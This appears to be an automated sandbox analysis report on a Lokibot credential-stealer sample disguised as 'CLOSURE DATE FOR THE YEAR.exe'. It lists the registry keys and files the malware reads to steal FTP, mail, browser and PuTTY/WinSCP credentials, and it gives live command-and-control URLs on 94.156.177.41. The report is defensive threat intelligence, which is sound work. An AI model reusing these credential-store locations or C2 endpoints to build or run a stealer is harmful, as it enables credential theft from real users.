Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Queries volume information: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CLOSURE DATE FOR THE YEAR.exe PID: 7480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: IOsbBBIDAm.exe PID: 8056, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000008.00000002.2903142728.0000000001258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: PopPassword		8_2_0040D069
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: SmtpPassword		8_2_0040D069

Source: Yara match	File source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	311 Process Injection	11 Disable or Modify Tools	2 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Access Token Manipulation	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	311 Process Injection	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
CLOSURE DATE FOR THE YEAR.exe	39%	ReversingLabs	Win32.Trojan.Generic
CLOSURE DATE FOR THE YEAR.exe	47%	Virustotal		Browse
CLOSURE DATE FOR THE YEAR.exe	100%	Avira	HEUR/AGEN.1357257
CLOSURE DATE FOR THE YEAR.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	100%	Avira	HEUR/AGEN.1357257
C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	39%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label	Link
http://94.156.177.41/kings/five/fre.php	0%	Avira URL Cloud	safe
94.156.177.41/kings/five/fre.php	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
94.156.177.41/kings/five/fre.php	true	Avira URL Cloud: safe	unknown
http://94.156.177.41/kings/five/fre.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.apache.org/licenses/LICENSE-2.0	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designersG	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/?	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/bThe	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers?	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.ibsensoftware.com/	RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, IOsbBBIDAm.exe, 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, IOsbBBIDAm.exe, 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.tiro.com	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.goodfont.co.kr	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	CLOSURE DATE FOR THE YEAR.exe, IOsbBBIDAm.exe.0.dr	false	high
http://www.carterandcone.coml	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sajatypeworks.com	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.typography.netD	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/cabarga.htmlN	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/cThe	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/staff/dennis.htm	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/frere-user.html	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.jiyu-kobo.co.jp/	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/DPlease	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers8	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://localhost/arkanoid_server/requests.php	IOsbBBIDAm.exe, 00000009.00000002.2066244082.00000000027D9000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fonts.com	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sandoll.co.kr	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.urwpp.deDPlease	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.zhongyicts.com.cn	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1754216796.00000000027E9000.00000004.00000800.00020000.00000000.sdmp, IOsbBBIDAm.exe, 00000009.00000002.2066244082.00000000027D9000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sakkal.com	CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.177.41	unknown	Bulgaria		43561	NET1-ASBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1568026
Start date and time:	2024-12-04 06:51:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	CLOSURE DATE FOR THE YEAR.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/20@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 70 Number of non-executed functions: 12
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:51:57	API Interceptor	1x Sleep call for process: CLOSURE DATE FOR THE YEAR.exe modified
00:52:04	API Interceptor	27x Sleep call for process: powershell.exe modified
00:52:07	API Interceptor	1x Sleep call for process: IOsbBBIDAm.exe modified
00:52:11	API Interceptor	60x Sleep call for process: RegSvcs.exe modified
00:52:36	API Interceptor	1x Sleep call for process: WerFault.exe modified
05:52:05	Task Scheduler	Run new task: IOsbBBIDAm path: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94.156.177.41	Order84746.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/davinci/five/fre.php
	FVR-N2411-07396.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/soja/five/fre.php
	Scan copy.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/simple/five/fre.php
	file.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php
	stthigns.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	goodtoseeuthatgreatthingswithentirethingsgreatfor.hta	Get hash	malicious	Cobalt Strike, Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	PO-000041492.docx.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	ECxDwGGFH3.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php
	greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NET1-ASBG	SwiftSec.arm.elf	Get hash	malicious	Mirai	Browse	93.123.85.8
	SwiftSec.arm7.elf	Get hash	malicious	Mirai	Browse	93.123.85.8
	SwiftSec.x86.elf	Get hash	malicious	Mirai	Browse	93.123.85.8
	boatnet.ppc.elf	Get hash	malicious	Mirai	Browse	93.123.85.24
	boatnet.arm7.elf	Get hash	malicious	Mirai	Browse	93.123.85.24
	boatnet.mpsl.elf	Get hash	malicious	Mirai	Browse	93.123.85.24
	boatnet.sh4.elf	Get hash	malicious	Mirai	Browse	93.123.85.24
	boatnet.spc.elf	Get hash	malicious	Mirai	Browse	93.123.85.24
	boatnet.mips.elf	Get hash	malicious	Mirai	Browse	93.123.85.24
	boatnet.x86.elf	Get hash	malicious	Mirai	Browse	93.123.85.24

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_IOsbBBIDAm.exe_f68f7c9fdad1c1ec87bcf3e0d056e688fbbaf9d_3c873a45_2d1111fb-8d04-4797-98f8-4868d602b81e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2659976902521664
Encrypted:	false
SSDEEP:	192:VCueXhFNA0BU/iaGeJo1ZrUSajKzuiFuZ24IO88/:UueXhFhBU/iahCIKzuiFuY4IO88/
MD5:	B870A7C2FFCF071AB6FB3D4B5D24E3BE
SHA1:	D26F100899C08BCA3B0A1871A4306381840D018A
SHA-256:	67725D3A3B9B1639B07AD30C206299AD6531AEA98D5E4BB4D00747B289072655
SHA-512:	BA44572B622DC098C862E63381D3CF7EBEED65E21B1A32E6936FD25DD6BC60439D0FF33BD1C940598D7B838252D4F208264C1AFFB99E39329F47E3BEB00D635C
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.7.6.5.1.3.3.7.1.9.7.4.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.7.6.5.1.3.5.2.3.5.3.5.6.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.1.1.1.1.f.b.-.8.d.0.4.-.4.7.9.7.-.9.8.f.8.-.4.8.6.8.d.6.0.2.b.8.1.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.d.d.9.1.d.e.7.-.c.f.5.0.-.4.f.1.a.-.9.7.4.b.-.0.e.b.7.6.a.b.b.d.3.a.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.O.s.b.B.B.I.D.A.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.Y.y.v...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.7.8.-.0.0.0.1.-.0.0.1.4.-.e.a.3.1.-.3.7.a.6.1.0.4.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.d.0.a.7.f.a.a.d.e.4.9.0.6.8.f.1.e.7.b.8.9.2.6.1.5.e.1.3.1.8.0.0.0.0.0.0.0.0.!.0.0.0.0.3.e.4.7.2.7.a.6.8.d.9.a.4.e.e.3.d.c.3.a.f.7.9.4.0.8.d.6.0.9.1.6.7.7.7.c.1.5.4.6.

